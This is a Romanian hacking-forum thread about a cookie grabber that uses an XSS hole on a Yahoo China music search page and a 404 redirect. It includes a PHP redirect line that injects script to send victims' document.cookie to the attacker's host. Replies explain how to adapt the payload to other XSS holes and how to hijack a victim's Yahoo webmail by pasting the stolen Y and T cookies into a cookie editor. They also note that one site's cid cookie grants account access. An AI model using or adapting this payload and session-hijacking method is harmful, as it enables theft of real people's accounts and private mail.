Jump to content
loki

Yah00 Cookie grabber bazat pe redirect 404

By loki, in Tutoriale in romana

Recommended Posts

Hellbound Newbie

Hellbound

Posted
Posted

Am si eu o intrebare nu prea am inteles ce cu xss dar le folosesc :roll:

Si vreau sa te intreb ceva lokipaki dupa ce v-a fi patchuit xss-ul si gasesc alt xss unde il inlocuiesc ?

Zimi daca e bine ... uite aici ?


$got=$_GET['got'];
if(!$got) { header('Location: '.$xss.'</title><script>document.location="http://'.$geturl.'?got=1%26get="%2Bescape(document.cookie);</script>'); exit();}

Daca nu explica-mi tu sa inteleg odata

Sau cand gasesc Xss la un site ce pot face cu el explicami in mare cam ce as face adik pot face tot un grabbed ? sau cum ?

Ms...

Link to comment
Share on other sites
loki Newbie

loki

Posted
  • Author
Posted

Nu acolo, aici:

// DE MODIFICAT DUPA CAZ:
$xss='http://music.cn.yahoo.com/search?p=';

In ideea ca urmeaza script dupa p=.

Am vrut sa separ pentru usurare dar pentru alte xss-uri e bine de umblat si mai jos:

</title><script>document.location= poate fi inlocuit deobicei cu "><script>document.location= (</title> are rol doar in acest caz de a optimiza viteza ca sa se execute imediat dupa zona titlu).

In concluzie pentru a generaliza codul pentru mai multe xss-uri se pot face modificarile codului asfel:

$xss='http://music.cn.yahoo.com/search?p=</title>';

...

if(!$got) { header('Location: '.$xss.'"><script>document.location="...

Dar ruperea asta a link-ului a fost facuta doar in scopul unei mai usoare intelegeri a codului.

Un xss la alt site il poti folosi similar dar pe situl ala. Trebuie sa stii la ce ai nevoie de cookie-ul de acolo dar in rest nu merge aceeasi metoda, numai la yahoo exista un link de intrare in mail. La altele poti fura cookie si lucra pe cookie-ul tau de pe disc pentru a obtine o sesiune. La neogen de exemplu e un cid= in cookie care odata inlocuit iti garanteaza accesul in cont.

Link to comment
Share on other sites
Hertz Newbie

Hertz

Posted
Posted

Instalati la Firefox COOKIE EDITOR si intrati pe mail.yahoo.com apoi va logati pe mailul vostru.Intrati in Cookie Editor si modificati Y si T ale voastre cu cele luat cu stealerul si apoi dati save urmat de refresh la pagina si veti fii pe mailul victimei.Bafta!

Edit: Pt AllexCT

Link to comment
Share on other sites
loki Newbie

loki

Posted
  • Author
Posted
Instalati la Firefox COOKIE EDITOR si intrati pe mail.yahoo.com apoi va logati pe mailul vostru.Intrati in Cookie Editor si modificati Y si T ale voastre cu cele luat cu stealerul si apoi dati save urmat de refresh la pagina si veti fii pe mailul victimei.Bafta!

Edit: Pt AllexCT

da man dar asta e metoda standard pentru orice cookie in afara de yahoo unde... nu mai modifici nimic; e unul din putinele servicii care iti ofera covorash roshu ca sa intri direct, adica link direct continand Y si T.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...